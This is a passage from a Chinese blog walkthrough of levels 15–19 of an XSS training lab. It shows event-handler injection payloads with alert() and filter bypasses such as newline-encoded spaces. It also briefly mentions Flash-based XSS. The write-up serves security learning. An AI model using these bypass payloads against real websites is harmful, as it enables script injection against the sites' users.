<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq52k5bf6ij30p60kcwle.jpg" alt="image-20210503111738101"></p>
<p>由于实体编码，就采用事件注入吧</p>
<p>构造payload</p>
<pre class=" language-js"><code class="language-js"><span class="token operator">?</span>src<span class="token operator">=</span><span class="token string">'levael1.php?name=&lt;input onclick=alert(2)>'</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq533kktizj30wt0fb7a8.jpg" alt="image-20210503113619450"></p>
<p>OKK</p>
<h4 id="第16关"><a href="#第16关" class="headerlink" title="第16关"></a>第16关</h4><ol>
<li>试探一下</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq5368ehv6j30r40hfgta.jpg" alt="image-20210503113851633"></p>
<p>发现script没了</p>
<ol start="2">
<li>可能不简单，看一下源代码</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq538ccmbnj30ns08dgmk.jpg" alt="image-20210503114053975"></p>
<p>过滤了空格，/，script</p>
<p>尝试其他的标签</p>
<pre class=" language-js"><code class="language-js"><span class="token operator">?</span>keyword<span class="token operator">=</span><span class="token operator">&lt;</span>input<span class="token operator">%</span>0Aonclick<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">></span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq53xhbbxrj30ke0bcq67.jpg" alt="image-20210503120502298"></p>
<h4 id="第17关"><a href="#第17关" class="headerlink" title="第17关"></a>第17关</h4><p>查看源代码</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq544yiouvj311t097q4s.jpg" alt="image-20210503121216312"></p>
<p>这个标签的解释:</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq540dqs3lj30ms0cqt9f.jpg" alt="image-20210503120752248"></p>
<p>根据地址栏发现注入点，但是不清楚怎么处理，看一下源代码</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq548l80cqj30nl047jrq.jpg" alt="image-20210503121544119"></p>
<p>直接利用事件注入就可以</p>
<pre class=" language-js"><code class="language-js"> onmouseover<span class="token operator">=</span>javascript<span class="token operator">=</span>javascript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq54ka3edqj30rp0cujsp.jpg" alt="image-20210503122659416"></p>
<p>火狐看不到图，我换成了google</p>
<h4 id="第18关"><a href="#第18关" class="headerlink" title="第18关"></a>第18关</h4><p>和17题类似，看一下源代码做了什么处理</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq56012uc7j30qo08ldgq.jpg" alt="image-20210503131643512"></p>
<p>好像是没啥变化？？</p>
<p>使用17题的payload</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq564l2qrkj30o508pab1.jpg" alt="image-20210503132105811"></p>
<p>过了</p>
<h4 id="第19关"><a href="#第19关" class="headerlink" title="第19关"></a>第19关</h4><p>试一下18关的代码</p>
<p>没用。。。。</p>
<p>看下源代码</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq56hniqckj30p804s0t0.jpg" alt="image-20210503133340170"></p>
<p>和之前不一样，这里需要闭合这个双引号，不然就以为只是一个属性，之前是不需要闭合的</p>
<p>由于经过了htmlspecialchars处理，双引号也在被处理的范围//</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/borrrrring/article/details/113573271?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_title-0&spm=1001.2101.3001.4242">参考</a></p>
<pre><code>Flash产生的xss问题主要有两种方式：
 1.加载第三方资源
 2.与javascript通信引发XSS。
</code></pre>
<p>由于各种浏览器，都看不到注入的结果是啥，先暂停一下，之后再弄。。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">尘落</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://echo-machile.github.io/2021/05/03/1.html">http://echo-machile.github.io/2021/05/03/1.html</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">尘落</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web/">
                                    <span class="chip bg-color">web</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/05/03/23950.html">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/13.jpg" class="responsive-img" alt="Docker详解">
                        
                        <span class="card-title">Docker详解</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-05-03
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            尘落
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/05/01/1.html">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/5.jpg" class="responsive-img" alt="初识owasp">
                        
                        <span class="card-title">初识owasp</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-05-01
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            尘落
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>

<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2021</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">尘落</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/blinkfox" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1181062873@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1181062873" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1181062873" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
